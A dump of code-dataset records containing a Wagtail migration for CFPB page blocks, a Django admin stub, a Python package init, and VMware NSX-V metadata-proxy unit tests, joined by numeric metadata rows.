b'Radio')])), (b'placeholder', wagtail.wagtailcore.blocks.CharBlock(required=False))]), required=False, icon=b'mail'))])), (b'contact', wagtail.wagtailcore.blocks.StructBlock([(b'contact', wagtail.wagtailsnippets.blocks.SnippetChooserBlock(v1.models.snippets.Contact))])), (b'sidebar_contact', wagtail.wagtailcore.blocks.StructBlock([(b'contact', wagtail.wagtailsnippets.blocks.SnippetChooserBlock(v1.models.snippets.Contact))])), (b'rss_feed', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[(b'blog_feed', b'Blog Feed'), (b'newsroom_feed', b'Newsroom Feed')])), (b'social_media', wagtail.wagtailcore.blocks.StructBlock([(b'is_share_view', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'If unchecked, social media icons will link users to official CFPB accounts. Do not fill in any further fields.', default=True, required=False, label=b'Desired action: share this page')), (b'blurb', wagtail.wagtailcore.blocks.CharBlock(help_text=b'Sets the tweet text, email subject line, and LinkedIn post text.', default=b"Look what I found on the CFPB's site!", required=False)), (b'twitter_text', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) Custom text for Twitter shares. If blank, will default to value of blurb field above.', max_length=100, required=False)), (b'twitter_related', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) A comma-separated list of accounts related to the content of the shared URL. Do not enter the @ symbol. If blank, it will default to just "cfpb".', required=False)), (b'twitter_hashtags', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) A comma-separated list of hashtags to be appended to default tweet text.', required=False)), (b'twitter_lang', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) Loads text components in the specified language, if other than English. E.g., use "es" for Spanish. See https://dev.twitter.com/web/overview/languages for a list of supported language codes.', required=False)), (b'email_title', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) Custom subject for email shares. If blank, will default to value of blurb field above.', required=False)), (b'email_text', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) Custom text for email shares. If blank, will default to "Check out this page from the CFPB".', required=False)), (b'email_signature', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) Adds a custom signature line to email shares. ', required=False)), (b'linkedin_title', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) Custom title for LinkedIn shares. If blank, will default to value of blurb field above.', required=False)), (b'linkedin_text', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) Custom text for LinkedIn shares.', required=False))]))], blank=True),
),
migrations.AlterField(
model_name='sublandingpage',
name='content',
field=wagtail.wagtailcore.fields.StreamField([(b'text_introduction', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'intro', wagtail.wagtailcore.blocks.RichTextBlock(required=False)), (b'body', wagtail.wagtailcore.blocks.RichTextBlock(required=False)), (b'links', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'url', wagtail.wagtailcore.blocks.CharBlock(default=b'/', required=False))]), required=False)), (b'has_rule', wagtail.wagtailcore.blocks.BooleanBlock(required=False))])), (b'featured_content', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'body', wagtail.wagtailcore.blocks.RichTextBlock(required=False)), (b'category', wagtail.wagtailcore.blocks.ChoiceBlock(required=False, choices=[(b'featured-event', b'Featured event'), (b'featured-blog', b'Featured blog'), (b'featured-video', b'Featured video'), (b'featured-tool', b'Featured tool'), (b'featured-news', b'Featured news'), (b'featured', b'Featured')])), (b'post', wagtail.wagtailcore.blocks.PageChooserBlock(required=False)), (b'show_post_link', wagtail.wagtailcore.blocks.BooleanBlock(required=False, label=b'Render post link?')), (b'post_link_text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'image', wagtail.wagtailcore.blocks.StructBlock([(b'upload', wagtail.wagtailimages.blocks.ImageChooserBlock(required=False)), (b'alt', wagtail.wagtailcore.blocks.CharBlock(required=False))])), (b'links', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'url', wagtail.wagtailcore.blocks.CharBlock(default=b'/', required=False))]), label=b'Additional Links')), (b'video', wagtail.wagtailcore.blocks.StructBlock([(b'id', wagtail.wagtailcore.blocks.CharBlock(help_text=b'E.g., in "https://www.youtube.com/watch?v=en0Iq8II4fA", the ID is everything after the "?v=".', required=False, label=b'ID')), (b'url', wagtail.wagtailcore.blocks.CharBlock(help_text=b'You must use the embed URL, e.g., https://www.youtube.com/embed/JPTg8ZB3j5c?autoplay=1&enablejsapi=1', required=False, label=b'URL')), (b'height', wagtail.wagtailcore.blocks.CharBlock(default=b'320', required=False)), (b'width', wagtail.wagtailcore.blocks.CharBlock(default=b'568', required=False))]))])), (b'image_text_25_75_group', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(required=False, icon=b'title')), (b'should_link_image', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b"Check this to link all images to the URL of the first link in their unit's list, if there is a link.", default=False, required=False)), (b'image_texts', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'body', wagtail.wagtailcore.blocks.RichTextBlock(required=False)), (b'image', wagtail.wagtailcore.blocks.StructBlock([(b'upload', wagtail.wagtailimages.blocks.ImageChooserBlock(required=False)), (b'alt', wagtail.wagtailcore.blocks.CharBlock(required=False))])), (b'links', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'url', wagtail.wagtailcore.blocks.CharBlock(default=b'/', required=False))]), required=False)), (b'has_rule', wagtail.wagtailcore.blocks.BooleanBlock(required=False))])))])), (b'image_text_50_50_group', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(required=False, icon=b'title')), (b'sharing', wagtail.wagtailcore.blocks.StructBlock([(b'shareable', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'If checked, share links will be included below the items.', required=False, label=b'Include sharing links?')), (b'share_blurb', wagtail.wagtailcore.blocks.CharBlock(help_text=b'Sets the tweet text, email subject line, and LinkedIn post text.', required=False))])), (b'image_texts', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'body', wagtail.wagtailcore.blocks.RichTextBlock(required=False, blank=True)), (b'image', wagtail.wagtailcore.blocks.StructBlock([(b'upload', wagtail.wagtailimages.blocks.ImageChooserBlock(required=False)), (b'alt', wagtail.wagtailcore.blocks.CharBlock(required=False))])), (b'is_widescreen', wagtail.wagtailcore.blocks.BooleanBlock(required=False, label=b'Use 16:9 image')), (b'is_button', wagtail.wagtailcore.blocks.BooleanBlock(required=False, label=b'Show links as button')), (b'links', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'url', wagtail.wagtailcore.blocks.CharBlock(default=b'/', required=False))]), required=False))])))])), (b'full_width_text', wagtail.wagtailcore.blocks.StreamBlock([(b'content_with_anchor', wagtail.wagtailcore.blocks.StructBlock([(b'content_block', wagtail.wagtailcore.blocks.RichTextBlock()), (b'anchor_link', wagtail.wagtailcore.blocks.StructBlock([(b'link_id', wagtail.wagtailcore.blocks.CharBlock(help_text=(b'Auto-generated on save, or enter some human-friendly text ', b'to make it easier to read.'), required=False, label=b'ID for this content block'))]))])), (b'content', wagtail.wagtailcore.blocks.RichTextBlock(icon=b'edit')), (b'media', wagtail.wagtailimages.blocks.ImageChooserBlock(icon=b'image')), (b'quote', wagtail.wagtailcore.blocks.StructBlock([(b'body', wagtail.wagtailcore.blocks.TextBlock()), (b'citation', wagtail.wagtailcore.blocks.TextBlock())])), (b'cta', wagtail.wagtailcore.blocks.StructBlock([(b'slug_text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'paragraph_text', wagtail.wagtailcore.blocks.RichTextBlock(required=False)), (b'button', wagtail.wagtailcore.blocks.StructBlock([(b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'url', wagtail.wagtailcore.blocks.CharBlock(default=b'/', required=False))]))])), (b'related_links', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'paragraph', wagtail.wagtailcore.blocks.RichTextBlock(required=False)), (b'links', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'url', wagtail.wagtailcore.blocks.CharBlock(default=b'/', required=False))])))])), (b'table', wagtail.wagtailcore.blocks.StructBlock([(b'headers', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.CharBlock())), (b'rows', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StreamBlock([(b'hyperlink', wagtail.wagtailcore.blocks.StructBlock([(b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'url', wagtail.wagtailcore.blocks.CharBlock(default=b'/', required=False))])), (b'text', wagtail.wagtailcore.blocks.CharBlock()), (b'text_blob', wagtail.wagtailcore.blocks.TextBlock()), (b'rich_text_blob', wagtail.wagtailcore.blocks.RichTextBlock())])))], editable=False)), (b'table_block', v1.atomic_elements.organisms.AtomicTableBlock(table_options={b'renderer': b'html'}))])), (b'half_width_link_blob_group', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(required=False, icon=b'title')), (b'has_top_border', wagtail.wagtailcore.blocks.BooleanBlock(required=False)), (b'has_bottom_border', wagtail.wagtailcore.blocks.BooleanBlock(required=False)), (b'link_blobs', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(required=False, label=b'H3 heading')), (b'sub_heading', wagtail.wagtailcore.blocks.CharBlock(required=False, label=b'H4 heading')), (b'sub_heading_icon', wagtail.wagtailcore.blocks.CharBlock(help_text=b'A list of icon names can be obtained at: https://cfpb.github.io/capital-framework/components/cf-icons/. Examples: linkedin-square, facebook-square, etc.', required=False, label=b'H4 heading icon')), (b'body', wagtail.wagtailcore.blocks.RichTextBlock(required=False, blank=True)), (b'links', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'url', wagtail.wagtailcore.blocks.CharBlock(default=b'/', required=False))]), required=False))])))])), (b'third_width_link_blob_group', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(required=False, icon=b'title')), (b'has_top_border', wagtail.wagtailcore.blocks.BooleanBlock(required=False)), (b'has_bottom_border', wagtail.wagtailcore.blocks.BooleanBlock(required=False)), (b'link_blobs', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(required=False, label=b'H3 heading')), (b'sub_heading', wagtail.wagtailcore.blocks.CharBlock(required=False, label=b'H4 heading')), (b'sub_heading_icon', wagtail.wagtailcore.blocks.CharBlock(help_text=b'A list of icon names can be obtained at: https://cfpb.github.io/capital-framework/components/cf-icons/. Examples: linkedin-square, facebook-square, etc.', required=False, label=b'H4 heading icon')), (b'body', wagtail.wagtailcore.blocks.RichTextBlock(required=False, blank=True)), (b'links', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'url', wagtail.wagtailcore.blocks.CharBlock(default=b'/', required=False))]), required=False))])))])), (b'post_preview_snapshot', wagtail.wagtailcore.blocks.StructBlock([(b'limit', wagtail.wagtailcore.blocks.CharBlock(help_text=b'How many posts do you want to show?', default=b'3', label=b'Limit')), (b'post_date_description', wagtail.wagtailcore.blocks.CharBlock(default=b'Published'))])), (b'well', wagtail.wagtailcore.blocks.StructBlock([(b'content', wagtail.wagtailcore.blocks.RichTextBlock(required=False, label=b'Well'))])), (b'table', wagtail.wagtailcore.blocks.StructBlock([(b'headers', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.CharBlock())), (b'rows', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StreamBlock([(b'hyperlink', wagtail.wagtailcore.blocks.StructBlock([(b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'url', wagtail.wagtailcore.blocks.CharBlock(default=b'/', required=False))])), (b'text', wagtail.wagtailcore.blocks.CharBlock()), (b'text_blob', wagtail.wagtailcore.blocks.TextBlock()), (b'rich_text_blob', wagtail.wagtailcore.blocks.RichTextBlock())])))], editable=False)), (b'table_block', v1.atomic_elements.organisms.AtomicTableBlock(table_options={b'renderer': b'html'})), (b'contact', wagtail.wagtailcore.blocks.StructBlock([(b'contact', wagtail.wagtailsnippets.blocks.SnippetChooserBlock(v1.models.snippets.Contact))])), (b'formfield_with_button', wagtail.wagtailcore.blocks.StructBlock([(b'btn_text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'required', wagtail.wagtailcore.blocks.BooleanBlock(required=False)), (b'info', wagtail.wagtailcore.blocks.RichTextBlock(required=False, label=b'Disclaimer')), (b'label', wagtail.wagtailcore.blocks.CharBlock(required=True)), (b'type', wagtail.wagtailcore.blocks.ChoiceBlock(required=False, choices=[(b'text', b'Text'), (b'checkbox', b'Checkbox'), (b'email', b'Email'), (b'number', b'Number'), (b'url', b'URL'), (b'radio', b'Radio')])), (b'placeholder', wagtail.wagtailcore.blocks.CharBlock(required=False))])), (b'reg_comment', wagtail.wagtailcore.blocks.StructBlock([(b'document_id', wagtail.wagtailcore.blocks.CharBlock(help_text=b'Federal Register document ID number to which the comment should be submitted. Should follow this format: CFPB-YYYY-####-####', required=True, label=b'Document ID')), (b'generic_regs_link', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'If unchecked, the link to comment at Regulations.gov if you want to add attachments will link directly to the document given above. Leave this checked if this comment form is being published before the full document is live at Regulations.gov, then uncheck it when the full document has been published.', default=True, required=False, label=b'Use generic Regs.gov link?')), (b'id', wagtail.wagtailcore.blocks.CharBlock(help_text=b"Sets the `id` attribute in the form's markup. If not set, the form will be assigned a base id of `o-reg-comment_` with a random number appended.", required=False, label=b'Form ID'))])), (b'feedback', wagtail.wagtailcore.blocks.StructBlock([(b'was_it_helpful_text', wagtail.wagtailcore.blocks.CharBlock(help_text=b'Use this field only for feedback forms that use "Was this helpful?" radio buttons.', default=b'Was this page helpful to you?', required=False)), (b'intro_text', wagtail.wagtailcore.blocks.CharBlock(help_text=b'Optional feedback intro', required=False)), (b'question_text', wagtail.wagtailcore.blocks.CharBlock(help_text=b'Optional expansion on intro', required=False)), (b'radio_intro', wagtail.wagtailcore.blocks.CharBlock(help_text=b'Leave blank unless you are building a feedback form with extra radio-button prompts, as in /owning-a-home/help-us-improve/.', required=False)), (b'radio_text', wagtail.wagtailcore.blocks.CharBlock(default=b'This information helps us understand your question better.', required=False)), (b'radio_question_1', wagtail.wagtailcore.blocks.CharBlock(default=b'How soon do you expect to buy a home?', required=False)), (b'radio_question_2', wagtail.wagtailcore.blocks.CharBlock(default=b'Do you currently own a home?', required=False)), (b'button_text', wagtail.wagtailcore.blocks.CharBlock(default=b'Submit')), (b'contact_advisory', wagtail.wagtailcore.blocks.RichTextBlock(help_text=b'Use only for feedback forms that ask for a contact email', required=False))]))], blank=True),
),
]
| 628.057143
| 14,031
| 0.77427
| 2,915
| 21,982
| 5.778388
| 0.136535
| 0.244716
| 0.322014
| 0.188079
| 0.768998
| 0.711232
| 0.672049
| 0.646343
| 0.595524
| 0.571717
| 0
| 0.003188
| 0.058138
| 21,982
| 34
| 14,032
| 646.529412
| 0.810375
| 0.000955
| 0
| 0.178571
| 0
| 0.571429
| 0.274512
| 0.009973
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.285714
| 0
| 0.392857
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
974aef4eec9facadf6008c192d8cf647e69ed0b3
| 228
|
py
|
Python
|
apps/admin.py
|
Edwardhgj/meiduo
|
38796f5caf54676eb5620f50ade5474ee8700ad8
|
[
"MIT"
] | null | null | null |
apps/admin.py
|
Edwardhgj/meiduo
|
38796f5caf54676eb5620f50ade5474ee8700ad8
|
[
"MIT"
] | 6
|
2020-06-05T23:02:49.000Z
|
2022-02-11T03:43:22.000Z
|
apps/admin.py
|
Edwardhgj/meiduo
|
38796f5caf54676eb5620f50ade5474ee8700ad8
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from apps.models import *
# Register your models here.
# admin.site.register(Cate)
# admin.site.register(Tags)
# admin.site.register(Goods)
# admin.site.register(Cate)
# admin.site.register(Cate)
| 28.5
| 32
| 0.77193
| 33
| 228
| 5.333333
| 0.424242
| 0.255682
| 0.482955
| 0.357955
| 0.431818
| 0.431818
| 0.431818
| 0
| 0
| 0
| 0
| 0
| 0.096491
| 228
| 8
| 33
| 28.5
| 0.854369
| 0.688596
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
97521493ec096906590e3d72301ba789ea0a3d2c
| 121
|
py
|
Python
|
pymdc/api/__init__.py
|
Storj/metadisk-client-python
|
71eaf200760f780ed7a9e50fecf0dd1f24273d91
|
[
"MIT"
] | null | null | null |
pymdc/api/__init__.py
|
Storj/metadisk-client-python
|
71eaf200760f780ed7a9e50fecf0dd1f24273d91
|
[
"MIT"
] | null | null | null |
pymdc/api/__init__.py
|
Storj/metadisk-client-python
|
71eaf200760f780ed7a9e50fecf0dd1f24273d91
|
[
"MIT"
] | null | null | null |
from . buckets import * # NOQA
from . files import * # NOQA
from . keys import * # NOQA
from . users import * # NOQA
| 24.2
| 31
| 0.636364
| 16
| 121
| 4.8125
| 0.4375
| 0.519481
| 0.545455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.264463
| 121
| 4
| 32
| 30.25
| 0.865169
| 0.157025
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
977c8ec8571a7c7044faceeb69f14e4814458444
| 12,365
|
py
|
Python
|
vmware_nsx/tests/unit/nsx_v/test_md_proxy.py
|
mail2nsrajesh/vmware-nsx
|
63154b510b9fd95c10fffae86bfc49073cafeb40
|
[
"Apache-2.0"
] | null | null | null |
vmware_nsx/tests/unit/nsx_v/test_md_proxy.py
|
mail2nsrajesh/vmware-nsx
|
63154b510b9fd95c10fffae86bfc49073cafeb40
|
[
"Apache-2.0"
] | null | null | null |
vmware_nsx/tests/unit/nsx_v/test_md_proxy.py
|
mail2nsrajesh/vmware-nsx
|
63154b510b9fd95c10fffae86bfc49073cafeb40
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2017 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from oslo_config import cfg
from vmware_nsx.db import nsxv_db
from vmware_nsx.db import nsxv_models
from vmware_nsx.plugins.nsx_v.vshield import edge_utils
from vmware_nsx.tests.unit.nsx_v import test_plugin
PLUGIN_NAME = 'vmware_nsx.plugin.NsxVPlugin'
# Run all relevant plugin tests when the metadata proxy is enabled.
# Those tests does not specifically test the md_proxy. just verify that
# nothing gets broken.
class NsxVPluginWithMdV2TestCase(test_plugin.NsxVPluginV2TestCase):
def setUp(self, plugin=PLUGIN_NAME,
ext_mgr=None,
service_plugins=None):
# Add the metadata configuration
cfg.CONF.set_override('mgt_net_moid', 'net-1', group="nsxv")
cfg.CONF.set_override('mgt_net_proxy_ips', ['2.2.2.2'], group="nsxv")
cfg.CONF.set_override('mgt_net_proxy_netmask', '255.255.255.0',
group="nsxv")
cfg.CONF.set_override('mgt_net_default_gateway', '1.1.1.1',
group="nsxv")
cfg.CONF.set_override('nova_metadata_ips', ['3.3.3.3'], group="nsxv")
# Add some mocks required for the md code
mock_alloc_vnic = mock.patch.object(nsxv_db, 'allocate_edge_vnic')
mock_alloc_vnic_inst = mock_alloc_vnic.start()
mock_alloc_vnic_inst.return_value = nsxv_models.NsxvEdgeVnicBinding
mock.patch.object(edge_utils, "update_internal_interface").start()
super(NsxVPluginWithMdV2TestCase, self).setUp(
plugin=plugin, ext_mgr=ext_mgr,
service_plugins=service_plugins)
class TestNetworksWithMdV2(test_plugin.TestNetworksV2,
NsxVPluginWithMdV2TestCase):
# Skip all the tests that count networks, as there is an
# additional internal network for metadata.
def test_list_networks_with_sort_native(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_list_networks_without_pk_in_fields_pagination_emulated(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_list_networks_with_sort_emulated(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_list_networks_with_shared(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_list_networks_without_pk_in_fields_pagination_native(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_list_networks_with_parameters(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_list_networks_with_pagination_native(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_list_networks_with_pagination_reverse_emulated(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_list_networks(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_list_networks_with_pagination_emulated(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_list_networks_with_pagination_reverse_native(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_list_networks_with_fields(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_create_networks_bulk_wrong_input(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_create_networks_bulk_native_plugin_failure(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_create_networks_bulk_native_quotas(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_create_networks_bulk_emulated_plugin_failure(self):
self.skipTest("The test is not suitable for the metadata test case")
class TestSubnetsWithMdV2(test_plugin.TestSubnetsV2,
NsxVPluginWithMdV2TestCase):
# Skip all the tests that count subnets, as there is an
# additional internal subnet for metadata.
def test_list_subnets_with_sort_native(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_list_subnets_with_sort_emulated(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_list_subnets_with_pagination_native(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_list_subnets_with_parameter(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_list_subnets_with_pagination_emulated(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_list_subnets_shared(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_list_subnets(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_create_subnets_bulk_native_plugin_failure(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_create_subnets_bulk_native_quotas(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_create_subnets_bulk_emulated_plugin_failure(self):
self.skipTest("The test is not suitable for the metadata test case")
class TestExclusiveRouterWithMdTestCase(
test_plugin.TestExclusiveRouterTestCase,
NsxVPluginWithMdV2TestCase):
# Skip all the tests that count firewall rules, as there are
# some MD specific rules
def test_router_set_gateway_with_nosnat(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_interfaces_different_tenants_update_firewall(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_interfaces_with_update_firewall(self):
self.skipTest("The test is not suitable for the metadata test case")
# Skip all the tests that count routers or ports, as there is
# an additional router for the md proxy
def test_router_list_with_pagination_reverse(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_list_with_sort(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_list_with_pagination(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_list(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_add_interface_delete_port_after_failure(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_create_router_fail_at_the_backend(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_floatingip_delete_router_intf_with_subnet_id_returns_409(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_floatingip_delete_router_intf_with_port_id_returns_409(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_address_scope_snat_rules(self):
self.skipTest("The test is not suitable for the metadata test case")
class TestVdrWithMdTestCase(test_plugin.TestVdrTestCase,
NsxVPluginWithMdV2TestCase):
# Skip all the tests that count firewall rules, as there are
# some MD specific rules
def test_router_set_gateway_with_nosnat(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_interfaces_different_tenants_update_firewall(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_interfaces_with_update_firewall(self):
self.skipTest("The test is not suitable for the metadata test case")
# Skip all the tests that count routers or ports, as there is
# an additional router for the md proxy
def test_router_list_with_pagination_reverse(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_list_with_sort(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_list_with_pagination(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_list(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_add_interface_delete_port_after_failure(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_create_router_fail_at_the_backend(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_floatingip_delete_router_intf_with_subnet_id_returns_409(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_floatingip_delete_router_intf_with_port_id_returns_409(self):
self.skipTest("The test is not suitable for the metadata test case")
#TODO(asarfaty): fix some mocks so those tests will pass
def test_router_plr_binding_default_size(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_plr_binding_configured_size(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_plr_binding_default_az(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_plr_binding_with_az(self):
self.skipTest("The test is not suitable for the metadata test case")
class TestSharedRouterWithMdTestCase(test_plugin.TestSharedRouterTestCase,
NsxVPluginWithMdV2TestCase):
# Skip all the tests that count firewall rules, as there are
# some MD specific rules
def test_router_set_gateway_with_nosnat(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_routers_set_gateway_with_nosnat(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_interfaces_different_tenants_update_firewall(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_interfaces_with_update_firewall(self):
self.skipTest("The test is not suitable for the metadata test case")
# Skip all the tests that count routers or ports, as there is
# an additional router for the md proxy
def test_router_list_with_pagination_reverse(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_list_with_sort(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_list_with_pagination(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_list(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_add_interface_delete_port_after_failure(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_create_router_fail_at_the_backend(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_floatingip_delete_router_intf_with_subnet_id_returns_409(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_floatingip_delete_router_intf_with_port_id_returns_409(self):
self.skipTest("The test is not suitable for the metadata test case")
| 43.385965
| 77
| 0.741448
| 1,805
| 12,365
| 4.852632
| 0.12133
| 0.047951
| 0.118735
| 0.140998
| 0.806028
| 0.803516
| 0.779998
| 0.76527
| 0.761502
| 0.752826
| 0
| 0.006139
| 0.196442
| 12,365
| 284
| 78
| 43.538732
| 0.875403
| 0.127457
| 0
| 0.63253
| 0
| 0
| 0.328776
| 0.009022
| 0
| 0
| 0
| 0.003521
| 0
| 1
| 0.39759
| false
| 0
| 0.036145
| 0
| 0.46988
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
97c9e99ee512ec002debce3bb8e185802e2001eb
| 112
|
py
|
Python
|
